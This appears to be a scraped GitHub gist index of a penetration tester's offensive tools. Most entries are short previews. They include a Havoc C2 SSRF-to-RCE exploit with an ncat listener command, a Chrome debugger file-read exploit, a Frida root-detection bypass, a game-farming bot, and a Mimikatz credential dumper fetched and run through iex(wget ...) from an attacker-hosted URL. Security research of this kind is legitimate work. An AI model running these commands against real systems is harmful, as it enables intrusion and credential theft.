LongCat pich4ya

@pich4ya
pich4ya / havoc_ssrf2rce.py
Last active January 28, 2026 01:26
The modified exploit code of SSRF (CVE-2024-41570) from @_chebuya and authN RCE from Laurence Tennant, Include Security
# Havoc C2 SSRF to AuthN RCE
# @author longcat (https://sth.sh)
#
# sudo ncat -lvp 443
# python havoc_ssrf2rce.py -t https://havoc.c2/ -l 1.3.3.7 --c2user 5pider --c2pass RKnnj5Vfq3bt9y7L
#
# The original authors are @_chebuya (SSRF) and Laurence Tennant, Include Security (AuthN RCE)
# Their writeups are great. I was so fascinated reading @_chebuya's blog post :)
# My work is just to integrate them into one single-shot exploit.
# In short, make WebSocket work with the Havoc C2 Agent Payload
@pich4ya
pich4ya / chrome_remote_debug_lfi.py
Created March 6, 2023 11:49
Chrome Debugger Local File Inclusion (No CVE, a security misconfiguration if the port is accessible for the attacker)
#!/usr/bin/env python
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Ported from https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/chrome_debugger.rb
# pip install requests websocket-client python-socks
# This exploit code can be used to read arbitrary files on the victim machine running
# chrome/chromium --remote-debugging-port=9222, which usually runs as a test automation tool during software testing
import requests
import json
import urllib3
import websocket
@pich4ya
pich4ya / root_bypass.js
Created August 5, 2019 20:14
Bypass Android Root Detection / Bypass RootBeer - August 2019
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (killed itself) if Magisk was installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
@pich4ya
pich4ya / proxychains-ng_m1.txt
Created March 6, 2023 03:25
Install proxychains-ng on macOS m1/m2 arm64e natively without Rosetta 2 (2023)
# @author Pichaya Morimoto (p.morimoto@sth.sh)
Problem:
```bash
brew install proxychains-ng
proxychains4 ncat 1.2.3.4 # not working
```
There are public workarounds like https://benobi.one/posts/running_brew_on_m1_for_x86/
@pich4ya
pich4ya / Invoke-OneShot-Mimikatz.ps1
Last active August 28, 2025 11:32
Invoke-OneShot-Mimikatz.ps1 - One Shot for Mimikatz PowerShell Dump All Creds with AMSI Bypass 2022 Edition (Tested and worked on Windows 10 x64 patched 2022-03-26)
# TLDR:
# iex(wget https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/e32760420ae642123599b6c9c2fddde2ecaf7a2b/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
#
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# One Shot for M1m1katz PowerShell Dump All Creds with AMSI Bypass 2022 Edition
# (Tested and worked on Windows 10 x64 patched 2022-03-26)
#
# Usage:
# 1. You need a local admin user's powershell with Medium Mandatory Level (whoami /all)
# 2. iex(wget https://attacker-local-ip/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
// Bot to farm TLM in the game Alien Worlds (the coins can be exchanged for real money on Binance)
// For testing only, don't use it for real; the author takes no responsibility for any bugs whatsoever
//
// Usage:
// 1. Sign up + log in at https://play.alienworlds.io/
// 2. You must have mined manually at least once before
// 3. Copy this script and paste it into the Console (F12)
// There are probably bugs around rate limits and the like; some of the if/loop parts can be removed
// Tried running it for fun for 5 hours from a fresh user and got 8 TLM (depends on luck and other things too)
// If anyone has free time, changing it to hit the API directly without going through JS should be much more stable
@pich4ya
pich4ya / Find-AclSth.ps1
Created April 16, 2022 12:28
Modified version of PowerView's Find-InterestingDomainAcl (Previously known as Invoke-ACLScanner) / Require PowerView.ps1
function Find-AclSth {
<#
.SYNOPSIS
Finds object ACLs in the current (or specified) domain with modification
rights set to non-built in objects.
Thanks Sean Metcalf (@pyrotek3) for the idea and guidance.
Author: Will Schroeder (@harmj0y)
@pich4ya
pich4ya / docker_context.txt
Created February 16, 2019 22:53
How to fix "ERROR: No build stage in current context"
Problem:
$ docker-compose up --build
Building xxx
ERROR: No build stage in current context
Analysis:
Dockerfile
@pich4ya
pich4ya / apk_getString_R_string.py
Last active January 19, 2025 15:28
This script can be used to replace strings.xml values in a target Java file
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# I tried all jadx options for deobf, but it did not work.
# This script can be used to replace strings.xml values in a target Java file
# if (!Intrinsics.areEqual(param, context.getString(R.string.m1))) { -> if (!Intrinsics.areEqual(param, "monday")) {
# Prompted and modified with ChatGPT for FlareOn 10's ItsOnFire
# Usage: python apk_getString_R_string.py resources/res/values/strings.xml sources/com/secure/itsonfire/MessageWorker.java
# Usage: python apk_getString_R_string.py resources/res/values/strings.xml sources
import xml.etree.ElementTree as ET
import re
import sys
@pich4ya
pich4ya / bookclub_exploit_rce.py
Last active December 29, 2024 07:42
Exploit for SEC Playground Bloody Xmas 2024 - Bookclub
#!/usr/bin/env python
# @author: longcat
# SEC Playground Bloody Xmas 2024 - Bookclub
# Exploit #2 - Read Flag w/ RCE (Reverse Shell)
import requests
import sys
import time
import argparse
import urllib3